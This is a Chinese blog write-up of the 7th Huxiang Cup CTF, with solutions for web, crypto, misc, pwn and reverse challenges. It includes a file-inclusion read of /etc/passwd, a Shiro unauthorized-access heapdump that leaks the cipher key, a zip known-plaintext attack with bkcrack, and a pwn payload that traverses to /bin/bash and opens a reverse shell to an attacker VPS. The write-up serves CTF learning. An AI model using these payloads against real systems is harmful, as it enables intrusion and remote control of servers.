第七届“湖湘杯” Bugku战队writeup

最新推荐文章于 2022-09-14 16:35:24 发布
最新推荐文章于 2022-09-14 16:35:24 发布
阅读量4.8k 收藏 3
点赞数 6
分类专栏: # 比赛&复现 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45696568/article/details/121358942
版权

我只解了一道密码和一道杂项,因为疫情没有去线下赛。

请添加图片描述

wp

web

Eazywill

开局给了源代码,审计一下
重点在View::fetch()函数,经过一系列流程调用了renderTo,以下是重点代码

extract($_vars);
include $cfile;

在这里插入图片描述
那么直接传参: /?name=cfile&value=/etc/passwd
可以读取,但是尝试读取/flag失败,
联想到以前看过https://tttang.com/archive/1312/
那么直接靠这个考点,直接传参:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Pentest in Autumn

首先给了pom.xml
提示shiro是1.5.0版本,有未授权访问漏洞
访问http://eci-2zej1goyn9jh89xtqlpd.cloudeci1.ichunqiu.com:8888/;a/actuator/heapdump,
然后使用MAT打开进行分析
直接oql查询:

select s from org.apache.shiro.web.mgt.CookieRememberMeManager s

直接查看左侧Attributes
在这里插入图片描述
在这里插入图片描述
根据密钥的生成规则,
base64.b64encode(struct.pack(’<bbbbbbbbbbbbbbbb’, -8,51,71,105,69,57,-45,-46,104,73,116,3,28,126,-34,58))
得到密钥:
+DNHaUU509JoSXQDHH7eOg==
然后使用shiro的利用工具,直接getflag
在这里插入图片描述

crypto

signin

和[羊城杯 2020]RRRRRRRSA挺像的,前面连分数逼近部分的脚本用的是翅膀师傅博客里的。

from Crypto.Util.number import *
from gmpy2 import *
def transform(x, y):  # 使用辗转相除将分数x/y转为连分数的形式
    res = []
    while y:
        res.append(x // y)
        x, y = y, x % y
    return res


def continued_fraction(sub_res):
    numerator, denominator = 1, 0
    for i in sub_res[::-1]:  # 从sublist的后面往前循环
        denominator, numerator = numerator, i * numerator + denominator
    return denominator, numerator  # 得到渐进分数的分母和分子,并返回


# 求解每个渐进分数
def sub_fraction(x, y):
    res = transform(x, y)
    res = list(map(continued_fraction, (res[0:i] for i in range(1, len(res)))))  # 将连分数的结果逐一截取以求渐进分数
    return res


def wienerAttack(n1, n2):
    for (q2, q1) in sub_fraction(n1, n2):  # 用一个for循环来注意试探n1/n2的连续函数的渐进分数,直到找到一个满足条件的渐进分数
        if q1 == 0:  # 可能会出现连分数的第一个为0的情况,排除
            continue
        if n1 % q1 == 0 and q1 != 1:  # 成立条件
            return (q1, q2)
    print("该方法不适用")
c1=361624030197288323178211941746074961985876772079713896964822566468795093475887773853629454653096485450671233584616088768705417987527877166166213574572987732852155320225332020636386698169212072312758052524652761304795529199864805108000796457423822443871436659548626629448170698048984709740274043050729249408577243328282313593461300703078854044587993248807613713896590402657788194264718603549894361488507629356532718775278399264279359256975688280723740017979438505001819438
c2=33322989148902718763644384246610630825314206644879155585369541624158380990667828419255828083639294898100922608833810585530801931417726134558845725168047585271855248605561256531342703212030641555260907310067120102069499927711242804407691706542428236208695153618955781372741765233319988193384708525251620506966304554054884590718068210659709406626033891748214407992041364462525367373648910810036622684929049996166651416565651803952838857960054689875755131784246099270581394

N1=1150398070565459492080597718626032792435556703413923483458704675295997646493249759818468321328556510074044954676615760446708253531839417036997811506222349194302791943489195718713797322878586379546657275419261647635859989280700191441312691274285176619391539387875252135478424580680264554294179123254566796890998243909286508189826458854346825493157697201495100628216832191035903848391447704849808577310612723700318670466035077202673373956324725108350230357879374234418393233
N2=1242678737076048096780023147702514112272319497423818488193557934695583793070332178723043194823444815153743889740338870676093799728875725651036060313223096288606947708155579060628807516053981975820338028456770109640111153719903207363617099371353910243497871090334898522942934052035102902892149792570965804205461900841595290667647854346905445201396273291648968142608158533514391348407631818144116768794595226974831093526512117505486679153727123796834305088741279455621586989
q1,q2=wienerAttack(N1, N2)

p1=iroot(N1//q1,4)[0]
p2=iroot(N2//q2,4)[0]

phi1=(p1**4-p1**3)*(q1-1)
phi2=(p2**4-p2**3)*(q2-1)

d1=invert(65537,phi1)
d2=invert(65537,phi2)
print(long_to_bytes(pow(c1,d1,N1)))
print(long_to_bytes(pow(c2,d2,N2)))

flag{8ef333ac-21a7-11ec-80f1-00155d83f114}

misc

某取证题

直接foremost,可以看到很多jpg图片和png图片,有的jpg图片上好像有字符,于是
在这里插入图片描述
一个一个dumpfiles弄出来,其中一张上面有后半个flag
在这里插入图片描述
接着pslist看进程,发现有wireshark,dump出来,再foremost,其中有一个加密的压缩包
在这里插入图片描述
尝试之后发现不是常规加密,是一种明文攻击,参考文章:https://blog.csdn.net/q851579181q/article/details/109767425

因为这里是jpg文件,所以选定文件头作为明文保存为key,这里选定的明文比较长,所以爆破速度会快很多,不过这一段是t.jpg对应的,跑秘钥的时候只能指定t.jpg。用FFD8FFE000104A4649460001作为明文段会慢一点,但是两个图片都能指定。

echo -n "FFD8FFE000104A4649460001010000010001" | xxd -r -ps >key

然后跑秘钥

time ./bkcrack -C 1.zip -c t.jpg -p key -o 0

最后能跑出三段秘钥b0a90b36 14dd97b9 f5d648cf

在这里插入图片描述

再用秘钥去解两个图片,这里以a.jpg为例,解出来之后发现是Deflate的压缩形式,不能直接查看,于是使用inflate.py进行解压

bkcrack -C 1.zip -c a.jpg  -k b0a90b36 14dd97b9 f5d648cf -d a1.jpg

在这里插入图片描述

#解压
python3 tools/inflate.py < a1.jpg > 2.jpg

解压之后就可以看到前一半flag
在这里插入图片描述

pwn

tiny_httpd

附件主页文件里发现有命令执行加绕过
方法
1.vps监听端口
2.然后连靶机nc执行下面命令

POST //...//...//...//...//...//...//...//...//...//...//...//.../bin/bashContent-Length: 100 HTTP/1.0 200 OKHTTP/1.0 200 OKbash -i >& /dev/tcp/vps地址/监听端口  0>&1 nc

vps上会弹shell,直接cat flag就行
在这里插入图片描述

reverse

Hideit

这个题首先祭出findcrypt
在这里插入图片描述
发现有salsa20
分析一下流程,其实需要调试
在这里插入图片描述
调试分析后发现是一个dll文件,分析算法
第一个算法是xxtea的加密算法,后面的才是findcrypt找到的salsa20算法。
第一个解出来密钥:dotitsit,,和真正的flag没啥关系
关键在于salas20算法,在内存中找到了0N3@aYI_M3l0dy_KurOm1_W_Suk1dqy0
至于算法的解密,其实都是异或算法,只要在内存中提取密钥流就行了,
把key和密文异或得出flag

key = [0x8D, 0xE2, 0x3D, 0xC2, 0x19, 0xF2, 0x2D, 0xCA, 0x18, 0x14, 0xCF, 0x52, 0x77, 0x5A, 0x9C, 0x13, 0xAA, 0xCC, 0x04, 0x5B, 0x92, 0xC1, 0x0C, 0x68, 0x45, 0x58, 0xF9, 0x47, 0x68, 0xD9, 0x35, 0xC5]
encstr = [0xEB, 0x8E, 0x5C, 0xA5, 0x62, 0xB4, 0x1C, 0x84, 0x5C, 0x59, 0xFC, 0x0D, 0x43, 0x3C, 0xAB, 0x20, 0xD8, 0x93, 0x33, 0x13, 0xA1, 0x9E, 0x39, 0x00, 0x76, 0x14, 0xB5, 0x04, 0x58, 0x9D, 0x06, 0xB8]
flag = ""
for i in range(32):
    flag += chr(key[i] ^ encstr[i])
print flag
#flag{F1NDM3_4f73r_7H3_5h3LLC0D3}
z.volcano
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
bugku-writeup-Reverse-逆向入门
dark的博客
07-07 420
题目:逆向入门 工具:1. 010 editor 2. base to img 在线工具 3. QR_Research 二维码识别离线软件 01—010 editor查看 使用010 editor打开,发现数据类型为png,采用base64编码,然后尝试将admin.exe修改为admin.png,发现无法打开图片。 02—base to img 将010 editor中所有的内容复制到basetoimg在线工具http://tool.chi...
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 3760
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
第七届"湖湘"网络安全大赛 - 初赛writeup
渗透测试研究中心
12-22 903
Webeasywill解题思路变量覆盖http://eci-2zej1goyn9jh8hty6ton.cloudeci1.ichunqiu.com/?name=cfile&value=/etc/passwdP神博客最近的文章利用pearcmd:https://tttang.com/archive/1312/Pentest in Autumn解题思路http://eci-2ze40jm52...
2021第七届湖湘-web-wp
midi
11-15 4195
第七届湖湘-web-wpWeb1 easywillWeb2 Pentest in Autumn Web1 easywill 题目给的附件Pom.xml Pom.xml 中有actuator http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator Springboot中actuator常见接口(1.x能够直接访问,2.x是在actuator目录下) 由于没有权限,接下来访问都是302 http://eci-2zedwevdy
2020湖湘 wp
weixin_46330722的博客
11-02 1975
2020湖湘 wpweb题目名字不重要反正题挺简单的NewWebsite 今天打了下湖湘,签到选手上线。 web 题目名字不重要反正题挺简单的 题目源码 <?php error_reporting(0); //I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker. if ( isset($_GET['file']) ) { $file = $_GET
Bugku 简单取证1【MISC】
最新发布
soysauce123的博客
09-14 2116
大胆猜测就是这个了现在用户名和密码都有了,但是这么一长串肯定不是我们想要的最终密码,我们再看看前面的hash ntlm 肯定是一种加密方式,我们通过相关的解码就可以了。因为现在我要在这个软件下打开我们刚才下载的题目config于是我们可以先通过cd查找我们现在所在的位置。这里肯定就是最终密码了,最后我们在bugku按照描述给我们的方式输入就可以了。第一次接触取证方面的题目,先简单了解一下,发现题目给的提示我们肯定需要得到相关的密码和用户名。可以通过这个获得相关的用户名和密码,那么我们先下载下来。
2021湖湘WEB
~airrudder~
03-02 846
文章目录2021 湖湘MultistaeAgencyPenetratablevote 2021 湖湘 MultistaeAgency 分析参考文章:2021湖湘决赛-MultistageAgency。 一道 Golang 的题目,附件目录结构如下所示: tree . ├── Dockerfile ├── dist │ ├── index.html │ └── static │ ├── css │ │ ├── app.21c401bdac17302cdde185ab
bugku杂项题writeup
11-22
bugku杂项题writeup
第二届安洵2019部分writeup
Sea_Sand息禅
12-01 6096
Misc 吹着⻉斯扫⼆维码 这个就有点过分了,36张碎片,手动拼二维码 先是爆破出了压缩包的密码,解出来flag.txt里面有点乱码,显然还需要操作,可能就跟二维码有关了,二维码扫出来的结果是: BASE Family Bucket ??? 85->64->85->13->16->32 下面就需要把flag.txt中的内容进行base的这一系列的解码了,但是这个1...
bugku-writeup-Crypto-小山丘的秘密
dark的博客
06-22 478
题目:小山丘的秘密 01—找线索 题目描述为“hill能有什么秘密?”因此考虑此题考查hill密码。flag.txt中提示A=1,而hill密码中A=0,需要调整一下排布:Z=0,A=1,B=2,C=3... hill密码解密还需要秘钥,题目中还给出一个棋盘,从上而下棋子数量依次为1 2 3 1 4 5 6,可表示为ABCADEF 02—解密 由于flag.txt中提示flag全为小写,因此调整字母表为zabcdefghijklmnopqrstuvwxy,秘钥为abczade.
md5crack3.zip
03-20
md5解码代码器
linux调用system参数格式化,湖湘2017 PWN 200格式化字符串漏洞详细WriteUp
weixin_35948624的博客
05-12 242
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。格式化字符串漏洞原理pwn题中,有形如下述代码的形式就是格式化字符串漏洞charstr[100];scarf("%s",str);printf(str)也许使用者的目的只是直接输出字符串,但是这段字符串来源于可控的输入,就造成了漏洞。示例程序如下编译:gcc -m32 -o str...
ZIP深入明文攻击 已更新(2021湖湘某取证题&美团鱿鱼游戏)
qq_47168481的博客
12-02 7098
misc解题过程中会遇到一些明文攻击的题目,基本的明文解密就不说了,介绍一下我对深入明文攻击的理解:
2020湖湘MISC全解-writeup
BlusKing
11-02 4604
MISC1 导出index-demo.html,查看代码发现隐藏了一长串base64 使用base64隐写进行解密 key:"lorrie" 得到key说明可能存在某种隐写,是snow隐写,但用网页版的snow隐写解出来是一串乱码,于是尝试使用本地版的SNOW.EXE SNOW.EXE -p lorrie index-demo.html flag{→_→←_←←_←←_←←_← →_→→_→←_←←_←←_← →_→←_←←_←←_← ←_←←_←←_←→_→→...
2020 湖湘 PWN WriteUp
SkYe's Blog
11-11 730
比赛的时候出去玩了,这就来复盘 babyheap 基本情况 增删查改,数量限制比较宽松挺大的,大小固定 0xf8 。 漏洞 safe_read 写入大小为 0xf8 会溢出修改下一个 chunk size 最低两位为 \x00 。 char *__fastcall safe_read(char *ptr, int size) { char *result; // rax read(0, ptr, 0xF0uLL); result = &ptr[size]; .
湖湘 2021 Crypto (连分数运用)
u010883831的博客
11-24 1438
湖湘 2021 Crypto1.题目2.分析3.实现 连分数 continued_fraction 比赛当时这道题被A爆了,但我就是做不出来。心态炸了。 前几天打西湖,学了点Wiener Attack和连分数,又打开了一直存在桌面的这道题,豁然开朗。 1.题目 from Crypto.Util.number import * import random from math import * from gmpy2 import * ''' m1 = bytes_to_long(flag[:len(flag
湖湘 2017 复赛Web部分题解
Assassin
11-25 3380
WebWeb200文件上传一开始真的以为是文件上传,后面发现是骗人的,简单的文件包含,扫描发现存在flag.php payloadhttp://118.190.87.135:10080/?op=php://filter/convert.base64-encode/resource=flag 解密得到flag<?php $flag="flag{c420fb4054e91944a71ff68f70
东软 DNUICTF-Misc(部分)
weixin_51804748的博客
12-09 889
ecryptedzip 附件是一个加密的压缩包,但是文件名都是可以看到的,比赛时我首先想到的爆破密码,但是爆了6位都没有成功,后来又尝试了crc32爆破,也没有成功 本题主要考察zip明文攻击,之前没做过类似的题目,赛后对着官方的wp做了一遍,学习一下 压缩包中有两个文件,一个是LICENSE开源协议文件,一个是README.md文件,初看可能无法想到如何拿到明文,我们可以先从网上下载常见的开源协议文件,并将文件大小与压缩包内的LICENSE进行对比,从而得到用于攻击的明文 签到 题面给出了flag,直接
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z.volcano

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值